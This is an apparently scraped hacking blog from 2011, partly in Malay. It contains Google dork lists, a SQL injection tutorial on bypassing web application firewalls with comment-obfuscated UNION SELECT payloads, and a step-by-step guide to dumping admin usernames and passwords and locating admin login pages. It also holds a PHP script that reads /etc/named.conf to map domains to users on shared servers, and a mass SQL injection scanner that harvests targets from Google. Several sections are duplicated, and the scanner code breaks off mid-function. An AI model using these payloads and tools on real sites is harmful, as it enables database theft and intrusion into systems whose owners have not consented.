inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
written by ejam at 09:08 pm
Comment (1) Permalink
WAF By-Passing
Friday, December 02, 2011
WAF By-Passing
You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.
WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attakcs against the site.
A WAF Error will look like this:
Code:
FORBIDDEN
You are not allowed to access "" on this server
*INFORMATION ABOUT THE WEBSERVER IS HERE*
If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.
There are several methods on how to by-pass the WAF, I will be explaining a few:
1.
You don't have to worry about getting the number of columns, the Firewalls don't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall.
The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--
That will by-pass the Firewall. However, we still have several steps. Because we still need the other information from the tables and columns.
Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:
Code:
http://www.hopefullyvulnerablesite.com/event.phpid=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--
To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--
Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name.
Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--
Now, that will be displaying all the tables. Now that access the table's information, we're going to use this commdn to by-pass the firewall:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--
There we go, now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*
And that's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert :).
This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.
SQL Injection IS ILLEGAL. So whatever you do with it, is your responsibilty, not mine. You can get in lots of trouble for an SQL Injection. Check out the Proxies and Socks section for protection while hacking a site.
Good luck! And have fun!
You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.
WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attakcs against the site.
A WAF Error will look like this:
Code:
FORBIDDEN
You are not allowed to access "" on this server
*INFORMATION ABOUT THE WEBSERVER IS HERE*
If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.
There are several methods on how to by-pass the WAF, I will be explaining a few:
1.
You don't have to worry about getting the number of columns, the Firewalls don't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall.
The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--
That will by-pass the Firewall. However, we still have several steps. Because we still need the other information from the tables and columns.
Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:
Code:
http://www.hopefullyvulnerablesite.com/event.phpid=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--
To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--
Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name.
Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--
Now, that will be displaying all the tables. Now that access the table's information, we're going to use this commdn to by-pass the firewall:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--
There we go, now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:
Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*
And that's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert :).
This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.
SQL Injection IS ILLEGAL. So whatever you do with it, is your responsibilty, not mine. You can get in lots of trouble for an SQL Injection. Check out the Proxies and Socks section for protection while hacking a site.
Good luck! And have fun!
written by ejam at 08:58 pm
Make a comment Permalink
SQLi injection tutorial
Friday, December 02, 2011
Dork:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
No1:
No3:
No4:
No6:cari nama column dlm table
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
=======================================================
Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/
=======================================================
No7:
No8: cari login page
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
No1:
http://www.victimsite.com/index.php?id=2'
akan keluar:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
No2:
http://www.victimsite.com/index.php?id=2 order by 1--(noerror)
http://www.victimsite.com/index.php?id=2 order by 2--(noerror)
http://www.victimsite.com/index.php?id=2 order by 3--(noerror)
http://www.victimsite.com/index.php?id=2 order by 4--(noerror)
http://www.victimsite.com/index.php?id=2 order by 5--(noerror)
http://www.victimsite.com/index.php?id=2 order by 6--(noerror)
http://www.victimsite.com/index.php?id=2 order by 7--(noerror)
http://www.victimsite.com/index.php?id=2 order by 8--(error)No3:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
atau
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--No4:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
atau
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
No5:cari nama table
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--No6:cari nama column dlm table
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
=======================================================
Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/
=======================================================
No7:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--No8: cari login page
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
atau gunakan site ni
http://sc0rpion.ir/af/
written by ejam at 08:39 pm
Make a comment Permalink
Local Domain.php (nak check local domain shaja)
Wednesday, November 30, 2011
<html>
<head>
<title>Local DOMAIN:USER Show | by [ Lagripe-Dz ]</title>
<style>*{ font-family:tahoma; font-size:12; } td,tr{ text-align:center;}</style>
</head>
<body>
<center>
<p>Local DOMAIN:USER Show | by [ Lagripe-Dz ]</p>
<p>[ <a href='?ShowAll'>Show All</a> ] - [ <a href='?UserDomains'>User Domains</a> ] - [ <a href='?DomainUser'>Domain User</a> ]</p>
<?
$file = @implode(@file("/etc/named.conf"));
if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
preg_match_all("#named/(.*?).db#",$file ,$r);
$domains = array_unique($r[1]);
check();
if(isset($_GET['ShowAll'])){
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
<tr><td>Domain</td><td>User</td></tr>";
foreach($domains as $domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
}
echo "</table>";
}
if(isset($_GET['UserDomains'])){
echo "
<form action='?UserDomains' method='GET'>
<input type=hidden name=UserDomains value=1>
User : <input type=text name=user value=$_GET[user]> - <input type=submit value=Show>
</form>
";
if(isset($_GET['user'])){
echo "<table border=1 width=30% cellpadding=5>
<tr><td><b>Domains ..</b></td></tr>";
foreach($domains as $n=>$domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo ($_GET['user'] == $user['name']) ? "<tr><td>$domain</td></tr>":"";
}
echo "</table>";
}
}
if(isset($_GET['DomainUser'])){
echo "
<form action='?DomainUser' method='GET'>
<input type=hidden name=DomainUser value=1>
Domain : <input type=text name=domain value=$_GET[domain]> - <input type=submit value=Show>
</form>
";
if(isset($_GET['domain'])){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$_GET['domain']));
echo "User is : [ ".$user['name']." ]";
}
}
function check(){(@count(@explode('ip',@implode(@file(__FILE__))))!=6) ?@unlink(__FILE__):"";}
?>
<p><a href="http://www.Sec4ever.com/">www.Sec4ever.com</a> | <a href="http://www.Lagripe-Dz.org/">
www.Lagripe-Dz.org</a><br> Algeria 2o1o-2o11</p>
</body>
</html>
<head>
<title>Local DOMAIN:USER Show | by [ Lagripe-Dz ]</title>
<style>*{ font-family:tahoma; font-size:12; } td,tr{ text-align:center;}</style>
</head>
<body>
<center>
<p>Local DOMAIN:USER Show | by [ Lagripe-Dz ]</p>
<p>[ <a href='?ShowAll'>Show All</a> ] - [ <a href='?UserDomains'>User Domains</a> ] - [ <a href='?DomainUser'>Domain User</a> ]</p>
<?
$file = @implode(@file("/etc/named.conf"));
if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
preg_match_all("#named/(.*?).db#",$file ,$r);
$domains = array_unique($r[1]);
check();
if(isset($_GET['ShowAll'])){
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
<tr><td>Domain</td><td>User</td></tr>";
foreach($domains as $domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
}
echo "</table>";
}
if(isset($_GET['UserDomains'])){
echo "
<form action='?UserDomains' method='GET'>
<input type=hidden name=UserDomains value=1>
User : <input type=text name=user value=$_GET[user]> - <input type=submit value=Show>
</form>
";
if(isset($_GET['user'])){
echo "<table border=1 width=30% cellpadding=5>
<tr><td><b>Domains ..</b></td></tr>";
foreach($domains as $n=>$domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo ($_GET['user'] == $user['name']) ? "<tr><td>$domain</td></tr>":"";
}
echo "</table>";
}
}
if(isset($_GET['DomainUser'])){
echo "
<form action='?DomainUser' method='GET'>
<input type=hidden name=DomainUser value=1>
Domain : <input type=text name=domain value=$_GET[domain]> - <input type=submit value=Show>
</form>
";
if(isset($_GET['domain'])){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$_GET['domain']));
echo "User is : [ ".$user['name']." ]";
}
}
function check(){(@count(@explode('ip',@implode(@file(__FILE__))))!=6) ?@unlink(__FILE__):"";}
?>
<p><a href="http://www.Sec4ever.com/">www.Sec4ever.com</a> | <a href="http://www.Lagripe-Dz.org/">
www.Lagripe-Dz.org</a><br> Algeria 2o1o-2o11</p>
</body>
</html>
written by ejam at 07:46 pm
Make a comment Permalink
SQLi Scanner.. credit to KH
Wednesday, November 30, 2011
<?php
$listC=array("Indonesia~~~ID","Afghanistan~~~AF","Albania~~~AL","Algeria~~~DZ","American Samoa~~~AS","Andorra~~~AD","Angola~~~AO","Anguilla~~~AI","Antarctica~~~AQ","Antigua and Barbuda~~~AG","Argentina~~~AR","Armenia~~~AM","Aruba~~~AW","Australia~~~AU","Austria~~~AT","Azerbaijan~~~AZ","Bahamas~~~BS","Bahrain~~~BH","Bangladesh~~~BD","Barbados~~~BB","Belarus~~~BY","Belgium~~~BE","Belize~~~BZ","Benin~~~BJ","Bermuda~~~BM","Bhutan~~~BT","Bolivia~~~BO","Bosnia","and Herzegovina~~~BA","Botswana~~~BW","Bouvet Island~~~BV","Brazil~~~BR","British Indian Ocean Territory~~~IO","Brunei Darussalam~~~BN","Bulgaria~~~BG","Burkina Faso~~~BF","Burundi~~~BI","Cambodia~~~KH","Cameroon~~~CM","Canada~~~CA","Cape Verde~~~CV","Cayman Islands~~~KY","Central African Republic~~~CF","Chad~~~TD","Chile~~~CL","China~~~CN","Christmas Island~~~CX","Cocos (Keeling) Islands~~~CC","Colombia~~~CO","Comoros~~~KM","Congo~~~CG","Congo, Democratic","Republic~~~CD","Cook Islands~~~CK","Costa Rica~~~CR","Cote d'Ivoire~~~CI","Croatia~~~HR","Cyprus~~~CY","Czech Republic~~~CZ","Denmark~~~DK","Djibouti~~~DJ","Dominica~~~DM","Dominican Republic~~~DO","East Timor~~~TL","Ecuador~~~EC","Egypt~~~EG","El Salvador~~~SV","Equatorial Guinea~~~GQ","Eritrea~~~ER","Estonia~~~EE","Ethiopia~~~ET","Falkland Islands (Malvinas)~~~FK","Faroe Islands~~~FO","Fiji~~~FJ","Finland~~~FI","France~~~FR","French Guiana~~~GF","French","Polynesia~~~PF","French Southern Territories~~~TF","Gabon~~~GA","Gambia~~~GM","Georgia~~~GE","Germany~~~DE","Ghana~~~GH","Gibraltar~~~GI","Greece~~~GR","Greenland~~~GL","Grenada~~~GD","Guadeloupe~~~GP","Guam~~~GU","Guatemala~~~GT","Guinea~~~GN","Guinea-Bissau~~~GW","Guyana~~~GY","Haiti~~~HT","Heard and","McDonald Islands~~~HM","Honduras~~~HN","Hong Kong~~~HK","Hungary~~~HU","Iceland~~~IS","India~~~IN","Indonesia~~~ID","Iraq~~~IQ","Ireland~~~IE","Israel~~~IL","Italy~~~IT","Jamaica~~~JM","Japan~~~JP","Jordan~~~JO","Kazakhstan~~~KZ","Kenya~~~KE","Kiribati~~~KI","Kuwait~~~KW","Kyrgyzstan~~~KG","Lao People's Democratic Republic~~~LA","Latvia~~~LV","Lebanon~~~LB","Lesotho~~~LS","Liberia~~~LR","Libya~~~LY","Liechtenstein~~~LI","Lithuania~~~LT","Luxembourg~~~LU","Macau~~~MO","Macedonia~~~MK","Madagascar~~~MG","Malawi~~~MW","Malaysia~~~MY","Maldives~~~MV","Mali~~~ML","Malta~~~MT","Marshall Islands~~~MH","Martinique~~~MQ","Mauritania~~~MR","Mauritius~~~MU","Mayotte~~~YT","Mexico~~~MX","Micronesia~~~FM","Moldova~~~MD","Monaco~~~MC","Mongolia~~~MN","Montserrat~~~MS","Morocco~~~MA","Mozambique~~~MZ","Namibia~~~NA","Nauru~~~NR","Nepal~~~NP","Netherlands~~~NL","Netherlands Antilles~~~AN","New Caledonia~~~NC","New Zealand~~~NZ","Nicaragua~~~NI","Niger~~~NE","Nigeria~~~NG","Niue~~~NU","Norfolk Island~~~NF","Northern Mariana Islands~~~MP","Norway~~~NO","Oman~~~OM","Pakistan~~~PK","Palau~~~PW","Palestinian Territory~~~PS","Panama~~~PA","Papua New Guinea~~~PG","Paraguay~~~PY","Peru~~~PE","Philippines~~~PH","Pitcairn~~~PN","Poland~~~PL","Portugal~~~PT","Puerto Rico~~~PR","Qatar~~~QA","Reunion~~~RE","Romania~~~RO","Russian Federation~~~RU","Rwanda~~~RW","Saint Kitts and Nevis~~~KN","Saint Lucia~~~LC","Saint Vincent and the Grenadines~~~VC","Samoa~~~WS","San Marino~~~SM","Sao Tome and Principe~~~ST","Saudi Arabia~~~SA","Senegal~~~SN","Serbia and Montenegro~~~CS","Seychelles~~~SC","Sierra Leone~~~SL","Singapore~~~SG","Slovakia~~~SK","Slovenia~~~SI","Solomon Islands~~~SB","Somalia~~~SO","South Africa~~~ZA","South Georgia and The South Sandwich Islands~~~GS","South Korea~~~KR","Spain~~~ES","Sri Lanka~~~LK","St. Helena~~~SH","St. Pierre and Miquelon~~~PM","Suriname~~~SR","Svalbard and Jan Mayen Islands~~~SJ","Swaziland~~~SZ","Sweden~~~SE","Switzerland~~~CH","Taiwan~~~TW","Tajikistan~~~TJ","Tanzania~~~TZ","Thailand~~~TH","Togo~~~TG","Tokelau~~~TK","Tonga~~~TO","Trinidad and Tobago~~~TT","Tunisia~~~TN","Turkey~~~TR","Turkmenistan~~~TM","Turks and Caicos Islands~~~TC","Tuvalu~~~TV","Uganda~~~UG","Ukraine~~~UA","United Arab Emirates~~~AE","United Kingdom~~~GB","United States~~~US","United States Minor Outlying Islands~~~UM","Uruguay~~~UY","Uzbekistan~~~UZ","Vanuatu~~~VU","Vatican~~~VA","Venezuela~~~VE","Viet Nam~~~VN","Virgin Islands (British)~~~VG","Virgin Islands (U.S.)~~~VI","Wallis and Futuna Islands~~~WF","Western Sahara~~~EH","Yemen~~~YE","Zambia~~~ZM","Zimbabwe~~~ZW","--Special--~~~MY","Government1~~~GOV","Government2~~~GO",".aero~~~AERO",".asia~~~ASIA",".biz~~~BIZ",".coop~~~COOP",".eu~~~EU",".info~~~INFO",".museum~~~MUSEUM",".name~~~NAME",".pro~~~PRO",".travel~~~TRAVEL",".fm~~~FM",".tv~~~TV",".cc~~~CC",".co~~~CO",".org~~~ORG",".net~~~NET",".mobi~~~MOBI");
?>
<html><!--
#################################################################
# __\_ #
# | II | #
# | , | #
# ______ \) #
# []/ KH \[] / #
# / \______/ \/ #
# / \ __ / #
# (\ \/ #
# . #
# #
#_ _ _______ __ _ _______ _ _ _______ _______ _ _ #
#|____/ |______ | \ | |_____| |_____| |_____| | |____/ #
#| \_ |______ | \_| | | | | | | |_____ | \_ #
# #
# WWW.KENAHACK.COM #
# KH supporter : Syam92x | Fakyu Tuyu #
# #
# #
# #
# Pemaju dunia IT Malaysia : #
# @ Ahli Syurga Crew #
# @ GaySec #
# @ Rilekscrew #
# @ WAHFM #
# @ h3x4 crew #
# @ Newbie3viLc063s #
# @ dan semua Underground Team #
# #
# #
#################################################################
//-->
<head>
<title>[ KH ] ~ SQLi scanner</title>
<style>
body{
background: #0F0F0F;
color: #A9A9A9;
font-family: monospace;
font-size: 12px;
}
input{
background: #808080;
border: 1px solid #000000;
color: #E6E6FA;
}
h2{
color: #E6E6FA;
}
a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
a:hover{ color: #00FFCC; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }
</style>
<link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAQAAAAAAAoAQAAFgAAACgAAAAQAAAAIAAAAAEABAAAAAAAgAAAAAAAAAAAAAAAEAAAAAAAAAAaSv8A////AFL//wCxAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAEQEBAQEAAQEAAREBAQAQAQABAQEBAQABAAEBAQEAEQARABABEAAAAAAAAAAAAAAAAAAAAAADMzMzMzMzMzMzMzIzMzMzMyIjIiMiIyMzMyMjIyMzIzMiIyMjIzMjMyMzIyMjMyMzIiMiIyMzIzMzMzMzMzMzMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"></link>
</head>
<body>
<center>
<br>
<Script Language='Javascript'><!--
document.write(unescape('%3C%69%6D%67%20%73%74%79%6C%65%3D%22%77%69%64%74%68%3A%20%34%35%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%33%31%70%78%3B%22%20%61%6C%74%3D%22%22%0A%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%32%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%41%73%6B%46%6F%68%70%79%31%72%51%2F%54%69%71%47%2D%57%56%6B%64%44%49%2F%41%41%41%41%41%41%41%41%41%4E%77%2F%4D%76%41%38%55%2D%50%73%73%42%45%2F%73%31%36%30%30%2F%73%63%2E%70%6E%67%22%3E'));
//-->
</Script>
<form action='' method='post'>
<b>Dork yg ingin digunakan</b>: <p><input type='text' name='dork' value='inurl:php?id='><br>
<select id="countryx" name="countryx">
<option value="*">Semua Negara</option>
<?php foreach($listC as $listC2){
list($cou,$idcou) = explode("~~~",$listC2);
if(strlen($cou)>15){
$coux2=substr($cou, 0, 15)."...";
}else{
$coux2=$cou;
}
if(!empty($cou) && !empty($idcou)){
$xttx.="<option value=\"".trim($cou)."---".trim($idcou)."\">".trim($coux2)."</option>";
}
}
echo $xttx;
?>
</select><br>
<input type="checkbox" name="vulne" value="1"><label>Hanya tunjuk yg <span style="color: red;">Vuln</span></label>
</p>
<input type='submit' value=' [ Scan ] '>
</form>
<hr></center><br>
<?php if($_POST['dork']){
doit();
} ?>
<br><Script Language='Javascript'><!--
document.write(unescape('%3C%63%65%6E%74%65%72%3E%0A%53%65%6E%61%72%61%69%20%44%6F%72%6B%20%3A%20%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6B%65%6E%61%68%61%63%6B%2E%63%6F%6D%2E%66%61%69%6C%2E%6A%65%6E%69%73%2E%74%78%74%2E%6D%79%63%72%65%77%73%2E%69%6E%66%6F%2F%64%6F%72%6B%6C%69%73%74%2D%50%48%50%2E%74%78%74%22%3E%3C%69%6D%67%0A%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%20%30%70%78%20%73%6F%6C%69%64%20%3B%20%77%69%64%74%68%3A%20%34%30%70%78%3B%20%68%65%69%67%68%74%3A%20%34%30%70%78%3B%22%20%61%6C%74%3D%22%22%0A%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%32%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%43%4F%6C%63%54%76%75%4C%56%39%38%2F%54%69%71%47%2D%57%2D%73%68%64%49%2F%41%41%41%41%41%41%41%41%41%4E%6F%2F%4D%4C%61%66%50%59%76%69%33%4B%4D%2F%73%31%36%30%30%2F%70%68%70%2E%70%6E%67%22%3E%3C%2F%61%3E%3C%61%0A%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6B%65%6E%61%68%61%63%6B%2E%63%6F%6D%2E%66%61%69%6C%2E%6A%65%6E%69%73%2E%74%78%74%2E%6D%79%63%72%65%77%73%2E%69%6E%66%6F%2F%64%6F%72%6B%6C%69%73%74%2D%41%53%50%2E%74%78%74%22%3E%3C%69%6D%67%0A%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%20%30%70%78%20%73%6F%6C%69%64%20%3B%20%77%69%64%74%68%3A%20%34%30%70%78%3B%20%68%65%69%67%68%74%3A%20%34%30%70%78%3B%22%20%61%6C%74%3D%22%22%0A%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%32%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%56%75%67%6A%6E%32%4F%52%47%50%73%2F%54%69%71%47%2D%50%66%4A%75%4E%49%2F%41%41%41%41%41%41%41%41%41%4E%59%2F%70%46%46%6A%6E%4D%53%35%57%71%41%2F%73%31%36%30%30%2F%61%73%70%2E%70%6E%67%22%3E%3C%2F%61%3E%3C%62%72%3E%0A%53%51%4C%69%20%54%75%74%6F%72%69%61%6C%20%28%20%6D%79%73%71%6C%20%35%2E%58%20%29%20%3A%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6B%65%6E%61%68%61%63%6B%2E%63%6F%6D%2F%32%30%31%31%2F%30%37%2F%68%74%68%2D%73%71%6C%2D%69%6E%6A%65%63%74%69%6F%6E%2E%68%74%6D%6C%22%20%0A%0A%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%3E%44%69%73%69%6E%69%3C%2F%61%3E%3C%62%72%3E%3C%61%0A%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6B%65%6E%61%68%61%63%6B%2E%63%6F%6D%22%3E%3C%69%6D%67%0A%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%20%30%70%78%20%73%6F%6C%69%64%20%3B%20%77%69%64%74%68%3A%20%33%34%34%70%78%3B%20%68%65%69%67%68%74%3A%20%36%36%70%78%3B%22%20%61%6C%74%3D%22%22%0A%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%74%41%35%65%51%61%35%4E%68%79%41%2F%54%69%71%47%2D%4B%56%36%35%64%49%2F%41%41%41%41%41%41%41%41%41%4E%67%2F%33%43%75%78%6B%67%56%46%31%6F%59%2F%73%31%36%30%30%2F%6B%65%6E%61%68%61%63%6B%2E%70%6E%67%22%3E%3C%2F%61%3E%0A%09%09%3C%2F%63%65%6E%74%65%72%3E'));
//-->
</Script>
</body>
</html>
<?php
function doit(){
if($_POST['countryx']){
@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');
$google = "http://www.google.com/search?source=hp&biw=1024&bih=414&btnG=Google+Search&num=100&start=REPLACE_START&q=REPLACE_DORK";
//$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
$i = 0;
$a = 0;
$b = 0;
$ax2 = 0;
if($_POST['countryx']!="*"){
list($cou2,$idcou2) = explode("---",$_POST['countryx']);
$dork=$_POST['dork']."+site:".$idcou2;
}else{
$dork=$_POST['dork']."*";
}
while($b <= 10000) {
$a = 0;
flush(); ob_flush();
echo "[#]Jumlah laman diScan : [ $b ]<br />";
echo "[#]Dork yg digunakan : [ <b>".$dork."</b> ]<br />";
if($_POST['vulne']=="1"){$vulnex="Ya";}else{$vulnex="Tidak";}
echo "[#]Hanya tunjuk yg Vuln? : <b>".$vulnex."</b><br />";
if(!empty($cou2)){echo "[#]Negara : <b>".Clean($cou2)."</b><br />";}
echo "[#]Sila tunggu...Scanning! .<br />";
flush(); ob_flush();
if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array($dork, "$b"), $google)), $val)){
echo "~scanning tidak berjaya O.o<br />";
flush(); ob_flush();
break;
}
preg_match_all("/<h3 class=(.*?)><a href=\"(.*?)\" [^>]*>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array($dork, "$b"), $google)), $sites);
echo "Keputusan Scanning...<br>";
flush(); ob_flush();
while(1){
preg_match("/http:\/\/(.*?)\/(.*?)/",$sites[2][$a],$sitesx);
$fx2 = false;
if($ax2==0){
if($sitesx[1]){$ax2=array($sitesx[1]);$fx2=true;}
}else{
if(!in_array($sitesx[1], $ax2)){
if($sitesx[1]){array_push($ax2,$sitesx[1]);$fx2=true;}
}
}
if($fx2 == true){
if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>[vuln]</font><br>";
}else{
if($_POST['vulne']!="1"){
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='grey'>[O.o]</font><br>";
flush(); ob_flush();
}
}
if($a > count($sites[2])-2) {
echo "Sila tunggu , scan page lain...<br />";
break;
}
}
$a = $a+1;
}
$b = $b+100;
}
}else{
die("Error dlm pemilihan Negara!");
}
}
function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
